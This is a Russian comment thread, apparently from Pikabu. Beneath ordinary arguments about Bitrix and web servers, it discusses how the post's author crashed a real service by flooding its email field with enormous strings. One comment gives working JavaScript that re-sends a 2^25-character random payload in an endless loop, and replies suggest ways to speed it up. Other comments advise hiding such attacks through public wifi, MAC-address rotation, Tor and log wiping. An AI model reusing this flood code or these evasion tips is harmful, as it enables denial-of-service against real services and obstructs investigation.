Речь в том - на сколько ты нужен.

1
Автор поста оценил этот комментарий
Хм..Прикольно, спасибо, не знал про такие различия. Надо будет почитать про смысл этого применения.
раскрыть ветку (1)
0
Автор поста оценил этот комментарий
Es6 гуглите. Много чего нового узнаете
0
Автор поста оценил этот комментарий
Иллюстрация к комментарию
раскрыть ветку (1)
0
Автор поста оценил этот комментарий
Ты не справился)
0
Автор поста оценил этот комментарий

До сих пор сервис лежит))

раскрыть ветку (1)
0
Автор поста оценил этот комментарий

Да какбы это одностраничник сделанный на коленке, на который забили болт в тот момент когда его написали.

0
Автор поста оценил этот комментарий
Есть совет лучше: не надо юзать CMS опенсурсные. Они все крайне хреновые. Их можно юзать только в случае отсутствия денег на программистов нормальных. Я с этими цмсками в свое время затрахался до такого состояния, что блевать тянет при любом упоминании их названий. Брр...
раскрыть ветку (1)
0
Автор поста оценил этот комментарий

Проще. Не надо использовать cms если планируется больше часа работы.

0
Автор поста оценил этот комментарий
Вот я и спрашиваю, приведите мне пример CMS, не самописа на базе какого-то фреймворка, а именно готовое решение, которое будет в плане безопасности реализовано лучше.

OctoberCMS, ядро Laravel. CraftCMS ядро Yii.

DjangoCMS ядро Django(python) и другие...


Тонны тысяч файлов = каких? файлов ядра или файлов сайта? вы не поверите, но в файлах ядра написаны модули с функционалом.

Файл, который просто делает requre другого файла, это не функционал - лишь мусор. Такого там полно. Делать скриншоты не буду, сейчас не найду. Когда чистил сайт клиента от вирусов, постоянно видел это дерьмо там в недрах ядра.


Я встречался и встречаюсь с сайтами на битриксе до сих пор. С новыми, со старыми, любыми. Везде все как из под палки.


Внутренний код движка не имеет общего вида. Имеет. Может в каких-то версиях допотопных и было так, но сейчас там всё по другому.

половина файлов написана в одном стиле - другая в другом.Это следствие перехода на новое ядро D7

Сначала пишите что все в одном стиле, и после этого сразу что да, все разное.


Не бойтесь, скоро будет всё Переписано на новый лад.

Я это слышу от вестников Битрикса уже какой год.


"Завтра будет лучше"

"D7 Будет лучше, только подожди"


Зачем вы пытаетесь защитить мусор, который живет лишь из-за того что студии варят на нем проценты?


Любые здравые разработчики, давно сидят на нормальных фреймворках, и не только Yii или Laravel.


К чему холливар о охуенности фреймворка D7. Если только слепой даун не увидит его отсталость от любого другого фрейма, который нормально поддерживается сообществом?


Коммерческий? Что это ему дает? Неуязвимость к высказываниям "что фрейм говно"?


Поставьте даже такие вещи как версионность, стиль кода, поддержка сообществом, в сравнение с другими фреймворками, он везде будет проигрывать.

раскрыть ветку (1)
0
Автор поста оценил этот комментарий

Аминь.

0
Автор поста оценил этот комментарий

Работает... то есть не работает! Збсь. ТОлько я б не рассказывал об этом на пикабу. Так они будут знать в чем дело. И как поправить. А так бы парились с поиском

Иллюстрация к комментарию
раскрыть ветку (1)
0
Автор поста оценил этот комментарий

Да я сам готов прогеру пояснить где и в чем косяк, так то. Я по сути не злой.

Да и подобного результата не ожидал добиться)

0
Автор поста оценил этот комментарий

Дружище, недооценивай странность работы наших органов в сфере ИТ. Ты прав, что просто так никто искать не будет, нах не надо. Но если вдруг кто то из этих олухов занесет куда надо пару лямов (а денег у них хватает), ты можешь очень внезапно приехать. И да, ты наверно рассчитываешь пойти в отказ и в "не докажете". Так вот доказывать никто ничего не будет. Ты сам во всем признаешься ) Почитай историю Паши Врублевского (гуглится легко). Может впредь поменьше будет желаний хвастаться такими подвигами на весь инет )

раскрыть ветку (1)
0
Автор поста оценил этот комментарий

Если бы было не западло занести пару лямов - занесли бы пару тыщ прогеру. Там сделать нормально минут 5 просто недо не быть ебланом.

То что сделали - это просто феерическое ебланство. Это не по незнанию сделали, а по причине того что в голове дурь.

0
Автор поста оценил этот комментарий

SQL учится как и html с css, по ходу дела)

раскрыть ветку (1)
0
Автор поста оценил этот комментарий

А вот не сказал бы базы проектировать порой срань как муторно. Джойны нормальные писать срань как муторно итп.

показать ответы
0
Автор поста оценил этот комментарий

Ну тогда начать можно с чего угодно, язык не определяет ваши знания, зная один язык на достаточном уровне вам хватит 3-5 дней чтобы освоить другой язык. А язык собственно выбирайте из того, чем хотите заниматься. Хотите заниматься веб разработкой, нужно знать html+css, js на начальном уровне и php

Если нравятся алгоритмы, машинное обучение и все такое далекое от свистоперделок - питон.

Хочется софт писать - Java.

Да, каждый из приведенных языков может использоваться в любой другой области, но камон, ребят, используйте инструменты правильно, на питоне писать бэк - извращение, как и на js например писать софт (Electron). Главное не слушайте этих хипстеров, универсальных языков и инструментовне бывает, а если и бывают, то они слабы в областях, для которых они не предназначены

раскрыть ветку (1)
0
Автор поста оценил этот комментарий

Про sql забыли)

показать ответы
0
Автор поста оценил этот комментарий

А какой это язык? и с чего вообще стоит начинать? я только паскалем пользовался максимум)

раскрыть ветку (1)
0
Автор поста оценил этот комментарий

См теги. Начинать с алгоритмов и решения задачек по проге.

показать ответы
1
Автор поста оценил этот комментарий

А как вы узнали что лимит именно 2^25?

раскрыть ветку (1)
0
Автор поста оценил этот комментарий

Эмпирически.

Мб там конечно лонг текст, что вполне возможно, потому как врядли там бы ставили списально фиксированное число.

Но 4гб он тупо принять без шансов ) Максимум метров 200 примет подобный сервер в память.

0
Автор поста оценил этот комментарий

Я в депрессии уже лет восемь.

раскрыть ветку (1)
0
Автор поста оценил этот комментарий

Вы просто не знаете что такое депрессия.

Путаете с иными состояниями.

5
Автор поста оценил этот комментарий
Иллюстрация к комментарию
раскрыть ветку (1)
0
Автор поста оценил этот комментарий

Ага, мне тоже понравилось.

0
Автор поста оценил этот комментарий
Подскажите пожалуйста, как расшифровать ”ТС“”
раскрыть ветку (1)
0
Автор поста оценил этот комментарий

Уже в посте писали: ТопикСтартер

1
Автор поста оценил этот комментарий
Ну сам nginx без php-fpm не умеет в php. А если ставить php-fpm, то не работают .htaccess и все операции по настройке нужно производить в конфигах. По этому для упрощения проксируют апач через nginx, тогда и htaccess для php работает и скорость почти как на чистом nginx'e
раскрыть ветку (1)
0
Автор поста оценил этот комментарий

Ну так htaccess нахрен не нужен. Оно медленное.

Но ок, мысль ясна)

показать ответы
0
Автор поста оценил этот комментарий

Я в курсе, но в данном случае это встроенный в макстон функционал, а не плагин

раскрыть ветку (1)
0
Автор поста оценил этот комментарий

Пфф... Сударь да поймите же. Это ip не тот который браузер знает. А тот который ему сказал сторонний сервис. Это не способность браузера, а способность стороннего сервиса. Опять же - покажите команду для данного браузера в js дабы вывести в консоль этот ip? Если уж вы говорите что можете его отправить.

показать ответы
0
Автор поста оценил этот комментарий

ой

Иллюстрация к комментарию
раскрыть ветку (1)
0
Автор поста оценил этот комментарий

Вы же понимаете что это плагин? Который работает через сторонний сервис?

Вас никто не обязывает использовать данный плагин.

Поставьте VPN и о госпади - этот ip изменится.

показать ответы
0
DELETED
Автор поста оценил этот комментарий
Ты хакер? Мне нужен хакер...
раскрыть ветку (1)
0
Автор поста оценил этот комментарий

Тыж программист! Защитник планеты!

Чинит всё от холодильника до лыж!)

1
Автор поста оценил этот комментарий

Если про питерский бесплатный инет в вагонах - то как минимум номер вагона, где точка доступа будет, плюс камеры и в вагонах и везде в метро, их там просто до хрена. И потом, если у тебя хорошие прокси - то нахрена вообще прятаться? запускай все из дома. Попадаются как раз те, кто забывает дома прокси включить.

раскрыть ветку (1)
0
Автор поста оценил этот комментарий

По проксям также всё вычисляется при особом желании =\

Ну а по камерам - что будут пытать всех кто был в вагоне? оО

показать ответы
0
Автор поста оценил этот комментарий

Ок, ты совершенно прав :). что не отменяет того, что без IP в логе следаку вообще искать нечего. Нужно логи за собой затирать, в общем :)

раскрыть ветку (1)
0
Автор поста оценил этот комментарий

Ну какбы берёшь делаешь себе проксю через общественный макдак, переправляя траффик через телефон. Профит.

Ещё вариант - делать через трафик общественной сети в метро. Вообще - не отследить как по мне. У тебя ноут в рюкзаке, ты просто едешь. Ничего не делаешь. Скрипты делают всё на автомате..)

показать ответы
0
Автор поста оценил этот комментарий

Ip клиента, конечно же. Что хоть не так сказал комментатор выше? Имхо, вы зря к нему прицепились. Ну, не браузер, непосредственно передает, но суть это не меняет. Сервер знает ip клиента

раскрыть ветку (1)
0
Автор поста оценил этот комментарий

Я прицепился к словам, что браузер передаёт ip. Браузер не знает свой глобальный ip.

показать ответы
0
Автор поста оценил этот комментарий

Вы встречали хоть раз профессиональные проекты, с кастомными админками заточенными строго под разрабатывающийся проект?

Битрикс и интернет-магазин это синонимы.

Что такое профессиональный проект?

раскрыть ветку (1)
0
Автор поста оценил этот комментарий

Битрикс и интернет магазин это синонимы? оО С каких пор?

0
Автор поста оценил этот комментарий

ТС, правильно ли я понимаю, они типа в БД в таблице не ограничили "ячейку" куда вписывается адрес ? Обычно ограничивают же....

раскрыть ветку (1)
0
Автор поста оценил этот комментарий

Ограничили. 32 миллионами символов..)

показать ответы
0
Автор поста оценил этот комментарий
ТС, а как самому такое сделать?
раскрыть ветку (1)
0
Автор поста оценил этот комментарий

Такое - это что?

0
Автор поста оценил этот комментарий

Есть такая причина: называется чтобы неповадно было

раскрыть ветку (1)
0
Автор поста оценил этот комментарий

Как бы тебе сказать.

Есть такая причина - западло.

Тратить деньги просто ради того чтоб потратить деньги? Те кто их зарабатывают их ценят.

Престижа не добавит. Бояться их не станут итп.

0
Автор поста оценил этот комментарий

Все-таки скорее именно на скрипт. Ибо под каждый скрипт запускается отдельный поток PHP. С самим же РНР все в порядке - остальной сайт работает.

раскрыть ветку (1)
0
Автор поста оценил этот комментарий

Остальной сайт не использует php

Это просто ajax/nginx вот и всё.

показать ответы
0
Автор поста оценил этот комментарий

Дак а вот это вот чо? Или врут негодяи?

Иллюстрация к комментарию
раскрыть ветку (1)
0
Автор поста оценил этот комментарий

Это и есть результат. У PHP закончилась память... Скрипт не может работать.

0
Автор поста оценил этот комментарий

Сообщение об ошибке касается только оперативной памяти. Судя по всему, на скрипт выделено 256Мб.

раскрыть ветку (1)
0
Автор поста оценил этот комментарий

Не на скрипт а на php просто утечка памяти....

показать ответы
0
Автор поста оценил этот комментарий

Я так понял, он им в базу поднасрал имейлами по 32 мегабайта размером, тем самым, съев место на диске

раскрыть ветку (1)
0
Автор поста оценил этот комментарий

Пытался... Просто из-за утечек памяти в коде сервис лёг и не встаёт =\

0
Автор поста оценил этот комментарий

Выглядит как идея не пользоваться String.append(String) 100500 раз, потому как НЕЗАВИСИМО от языка(java,c# и даже object *) это будет именно так вызываться каждый раз конструкором нового объекта при аппенде. Да даже в C++ String классе...

А пишу я много на чём как бы, оттуда и познания что будет полнейшая херня со скоростью в таком виде.

раскрыть ветку (1)
0
Автор поста оценил этот комментарий

Ну вот я и не понимаю предъяв к этому исполнению у меня)

1
Автор поста оценил этот комментарий

Какой опыт  работы с D7? Или как всегда, слышу слово Битрикс = автоматом какашка?


P.S> Если уж быть пипец дотошным, то среди большинства CMS, битрикс наиболее удобен и безопасен. Если смотреть в сторону кодовой базы, то новое ядро D7 по удобству подходит к тому же yii2. Если вы конкретно чего-то не знаете или не умеете, то это только ваша проблема

раскрыть ветку (1)
0
Автор поста оценил этот комментарий

Потому что это узкоспециализированный херовый инструмент.

Если надо что-то собрать быстро и ок, то норм, имеет право на жизнь.Поддерживать его - не вариант.

Юи - это не CMS опять же. Удобство?.. Ну блин, если не умеешь пользоваться фреймворками - все будет хреново.

Вы назовите плюсы битрикса?

показать ответы
0
Автор поста оценил этот комментарий

Вы на чем пишете-то? Выглядит как желание натянуть язык который вы знаете на JS :)

раскрыть ветку (1)
0
Автор поста оценил этот комментарий

Много на чём. На ноде в томчисле, так то..)

0
DELETED
Автор поста оценил этот комментарий

(function (attempt) {

  return fetch(url, {

    method: 'POST',

    body: (() => {

      const data = new FormData();

      data.append('email', Array.from(function*(size) {

        while(size--) {

          yield String.fromCodePoint(~~(Math.random(1, 255) * 255))

        }

      }(2**25)).join(''));
      return data;

    })

  })

  .then((response) => console.log(attempt+1, response))

  .finally(() => arguments.callee(attempt+1));

})();

Это ничем не лучше, просто как вариант.
ну и тут нет jquery, или чем вы там данные отправляли.

раскрыть ветку (1)
0
Автор поста оценил этот комментарий

Сразу: либо всё через функшены пишите либо всё через ()=>{}

Не стоит 2 стиля тащить. А так - фетч да, получше будет.

console.log(attempt++, response)

вот это не очень ясно, да и странно тут итератор ставить

Я бы в файнали запихнул ++attempt тогда уж.

А так - мило. Вы как минимум потратили своё время, а не просто орали что код говно и надо иначе))

показать ответы
0
Автор поста оценил этот комментарий

Лучше сразу думать о будущем) Три года в web разработке - ни разу не пользовался битриксом, так и не довелось посмотреть - что находится под капотом. Попал под другую раздачу - сделали достаточно сложный портал на dle (кто скажет, что это нормальная cms - позову геолога), нововведения росли, писал их какой-то программист в таком же стиле кода, потом пропал, но посещаемость росла, да и баги которые остались от программиста - давали о себе знать. Сначала я что-то правил, оптимизировал запросы и.т.д., но эта убогая платная cms - только ставила палки в колеса. В итоге пол года, точно, ушло, чтобы уйти от dle к связке fastroute + di + blade + простая orm, 99% кода переписывалось. Фреймворк взять было нельзя - не известно было, выдержит ли? А зря время тратить не хотелось, поэтому, сначала, все собиралось в классы, помаленьку подключались зависимости, писалось - рефакторилось и по кругу. Сколько денег можно было сэкономить, если бы сразу выбрали правильный инструмент.

P.S Иногда листаю интернет, и вижу темы о - "на чем сделать сайт", и ответы на них - "для большой нагрузки берите dle, она легкая", даже в 2018 пишут такую чушь... Хочется посмотреть этим людям в глаза и попросить показать, как у них все это будет работать не на одной статитке при 8ккк+ посещений в сутки, если там банальная, выборка по категориям проходит через regexp, а разработчики кроме ctr+c + ctrl+v ничего не используют для повторения кода...

раскрыть ветку (1)
0
Автор поста оценил этот комментарий

Да блин, когда большое количество предполагается там всплывают шардинги, лютые настройки итп, вот там веселье ))

0
Автор поста оценил этот комментарий

и я ботоводил... год назад. и даже денежку получал за это от благодарных пользователей )

раскрыть ветку (1)
0
Автор поста оценил этот комментарий

Я не про ботов в играх)

Автоматизация...

показать ответы
0
Автор поста оценил этот комментарий

А, уловила. Спасибо.

раскрыть ветку (1)
0
Автор поста оценил этот комментарий

Можете стукнуть в какой либо из месенджеров и описать зачем вам сайт. Подскажу на чём это лучше делать в принципе и как подходить к задаче.

*вы как программист или как заказчик вообще смотрите?

Как заказчик во-первых выходит так, что если вы хотите сделать сайт и забыть, то битрикс норм, но блин если хотите внести правки выливается в лютые цены. Каждый разраб туда смотрит как с нуля и охреневает.

показать ответы
0
Автор поста оценил этот комментарий
Прошу прощения, можно дилетантский вопрос? А чем плох Битрикс? И что лучше выбрать вместо него?
раскрыть ветку (1)
0
Автор поста оценил этот комментарий

На деле вопрос задачи. Это из серии - чем плох хуёвый гаечный ключ? Всем, но если тебе надо прикрутить раз в год гайку, то он лучше чем офигительный который прослужит сто лет.

Битрикс - платформа для быстрого клепания сайтов и она вяжется с 1C

Если нужен не сайт сделанный за неделю, то лучше собирать с нуля на фреймворке какомнить.

Смотря что вам надо.

показать ответы
0
Автор поста оценил этот комментарий

Найти, индефицировать, слепить дело и посадить - элементарно, были бы деньги. А у кэшбери они , я подозреваю есть.

раскрыть ветку (1)
0
Автор поста оценил этот комментарий

Эх. Было бы за что искать)

0
Автор поста оценил этот комментарий

на крон повесил?

раскрыть ветку (1)
0
Автор поста оценил этот комментарий

Не дошло до крона. С консоли поставил, да посидел поработал дальше. Оно и легло =\

показать ответы
0
Автор поста оценил этот комментарий

Из уровня выше ещё. Здесь лучше было вообще статику делать.

раскрыть ветку (1)
0
Автор поста оценил этот комментарий

Ну какбы суть в том что нужно понимать зачем мы что-то оптимизируем..)

Я сначала накатал строку в которой делаю рандомную строку длиной N, накатал скрипт... Потестил на разных степенях..) Сервис лёг..) Увы - модифицировать нечего, смысла в этом ноль, сервис уже лежит..)

показать ответы
2
Автор поста оценил этот комментарий

Ну, самое очевидное - это конечно не использовать JS, а то, где есть адекватный инициализатор(самое весёлое ). Но на худой конецесть куча методов. Вот интересный прикол с массивами, я бы о таком и не подумал, привет spectre к слову.

https://jsperf.com/dirty-performance-secrets-html5

Но ещё раз, основные факторы.

1. Array - 100%. preallocated of fixed size лучше. И только по заполнению его в String.

2. В arrray можно спокойно использовать инициализер. Но для более-менее рандома я бы его паттерном сделал и клал по 8-16 элементов из известного набитого от балды вместо рандома, см. пункт 4

3. random ОЧЕНЬ тормозной, избегай его. Так же спокойно можно нули использовать, там будет иной бонус - http post gzip

4. Рандом допустим, но для паттерна например. Чтобы каждый раз был массив 8..128 байт который будет рандомно инициализироваться, а потом копироваться паттернами или прямо собой в наш выходной.

раскрыть ветку (1)
0
Автор поста оценил этот комментарий

Это всё задачи не из этой темы..

js взят просто потому что я браузер открыл - оп, а давай попробую отправлю) Зачем писать нечто более сложное?


Оптимизация строки?.. Мы же понимаем что горлышко у этой бутылки - трафик?) После того как написано нечто рабочее можно уже заняться оптимизацией... Только вот зачем?)

На этот код в js у меня ушло ну минуты 3...

Что в нём можно было улучшить когда я понял что оно работает и выяснив длину строки в базе?) Вариант со строкой не лучший - согласен. Но просто моя прихоть. Хотел весь пул аски. Так то можно было 2^20 нулей + (++i)

С точки зрения трафика 1 хрен..)

А создавать строку... Заполнять её... Просто сложные действия, которые вообще ничего не принесут.

показать ответы
1
Автор поста оценил этот комментарий

Лол. Гуглите apache+nginx. через nginx отдается статика в такой связке. через апач всё остальное.

раскрыть ветку (1)
Автор поста оценил этот комментарий

Ненене, я понял... А смысл в этом хоть какой-то есть?..

показать ответы
1
Автор поста оценил этот комментарий

Чего? Т.е. вы не слышали про настройку с проксирующим nginx'ом как собственно и работают сейчас 99% хостингов? Nginx отвечает за статику, апач за пых

раскрыть ветку (1)
Автор поста оценил этот комментарий

Погоди, а нахера тут апач?..

Не проще ли без него обойтись в этой цепи?..


Честно я не сверх админ, да могу ошибаться)

показать ответы
0
Автор поста оценил этот комментарий

мдэ. там нет битрикса. вообще ниразу. есть сборка apache+nginx+mysql и т.д.. настроенная разработчиками битрикса. Самой CMS битрикс на этом сайте нет.

раскрыть ветку (1)
Автор поста оценил этот комментарий

Сударь, либо апач, либо нжинкс ) Они не дружат друг с другом ибо хавают один и тот же порт.

показать ответы
3
Автор поста оценил этот комментарий

Четыре года в webe, исключительно на битриксе. С другими фреймворками не работал, но битрикс пока устраивает всем. Особенно ценой, движок дорогой, и в основном порог входа среди клиентов высокий. Поэтому нет таких заказчиков "В 5000 не уложимся да?"

Честно скажу, сравнивать не с чем, но явных минусов в данной платформе не вижу. Кого то воротит от логики, по которой расположены компоненты, но за 4 года поднаторел и уже наизусть все знаю.

Да и если честно, клиентам нравится админка, интуитивно удобная, легко забивать/редактировать контент

раскрыть ветку (1)
Автор поста оценил этот комментарий

Битрикс - это не фреймворк, а CMS.

Соответственно про то и речь, этим не занимаются компетентные люди

Это как воротить говно лопатой, будут платить - найдутся люди.

показать ответы
Автор поста оценил этот комментарий

Наиболее удобен и безопасен среди кого? WordPress? Joomla? MODX?

Хватит держать в уме, что сейчас есть только 4 эти платформы.


Вы встречали хоть раз профессиональные проекты, с кастомными админками заточенными строго под разрабатывающийся проект?


Битрикс - это развернуть сайт, связать с 1С, и получить процент с продажи лицензии.


Тонны тысяч файлов, ужасная файловая структура. Внутренний код движка не имеет общего вида, половина файлов написана в одном стиле - другая в другом.


Мне жаль ваши 4 года потраченные на Битрикс.

раскрыть ветку (1)
Автор поста оценил этот комментарий

Аминь

4
Автор поста оценил этот комментарий

Блин, народ, если не разбираетесь, то чего гадать то? Браузер (без плагинов, троянов и прочего дерьма) может передать на сервак сайта имя браузера, версию операционки, разрешение экрана, наборы шрифтов в системе и еще кое какую мелочевку. Еще айпи адрес само собой. Точка доступа в принципе может записать в лог мас адрес (а может и не записать). Ставишь на ноутбук линух, тулу для постоянной ротации рандомных мак адресов, десяток виртуальных машин для выхода в инет с разных операционок и браузеров и товарищ майор тебя нихрена не найдет, от слова  совсем. Конечно подразумевается, что для серьезных хаков ты юзаешь тор, i2p и еще кое какие полезные вещи, твой ноут зашифрован до упора веракриптом или аналогами и паттерны перемещений твоего легального мобильника нельзя скоррелировать с твоими выходами в сетку для хаков.

раскрыть ветку (1)
Автор поста оценил этот комментарий

Браузер не может передавать айпи адрес. Он его не знает.

Не несите херню)

показать ответы